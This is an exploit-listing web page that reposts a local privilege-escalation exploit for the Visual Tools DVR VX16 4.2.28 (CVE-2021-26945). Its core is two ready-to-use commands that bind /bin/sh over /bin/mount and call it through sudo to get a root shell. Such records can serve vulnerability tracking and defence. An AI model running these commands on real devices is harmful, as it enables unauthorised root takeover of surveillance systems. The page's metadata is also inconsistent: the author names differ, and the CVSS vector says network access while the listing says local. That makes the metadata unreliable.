Advertisement






Visual Tools DVR VX16 4.2.28 Privilege Escalation

CVE Category Price Severity
CVE-2021-26945 CWE-264 $5000 High
Author Risk Exploitation Type Date
Tomasz Uzar High Local 2021-07-07
CPE
cpe:cpe:/a:visual_tools:dvr_vx16:4.2.28
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.38895 0.927211

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070046

Below is a copy:

Visual Tools DVR VX16 4.2.28 Privilege Escalation
# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.

#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.

sudo mount -o bind /bin/sh /bin/mount
sudo mount

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.